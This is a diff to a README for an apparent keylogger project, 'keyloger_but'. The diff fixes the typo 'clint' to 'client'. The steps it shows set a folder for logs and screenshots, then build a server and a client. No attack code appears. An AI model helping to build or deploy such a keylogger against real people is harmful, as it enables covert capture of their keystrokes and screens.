pcthuoc/keyloger_but/README.md

 ### How to Use ?

 1. change path folder to save log and screenshot.
   - const char filePath[] = "/home/pcthuoc/Desktop/server/log/";
 3. build sever
-4. buid clint
+4. buid client